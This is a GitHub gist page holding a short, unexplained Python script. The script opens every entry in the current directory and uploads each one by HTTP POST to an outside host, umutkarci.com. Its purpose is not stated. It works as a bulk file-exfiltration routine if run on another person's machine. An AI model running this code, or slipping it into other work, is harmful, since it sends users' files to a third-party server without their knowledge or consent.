Skip to content

Instantly share code, notes, and snippets.

@Cediddi
Last active August 29, 2015 14:23
Show Gist options
  • Save Cediddi/482fc2cc7efd65ff01dd to your computer and use it in GitHub Desktop.
Save Cediddi/482fc2cc7efd65ff01dd to your computer and use it in GitHub Desktop.
from requests import post
from os import listdir
for i in listdir():
with open(i, "rb") as f:
post("http://umutkarci.com/dosyayukle", files={"file":f})
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment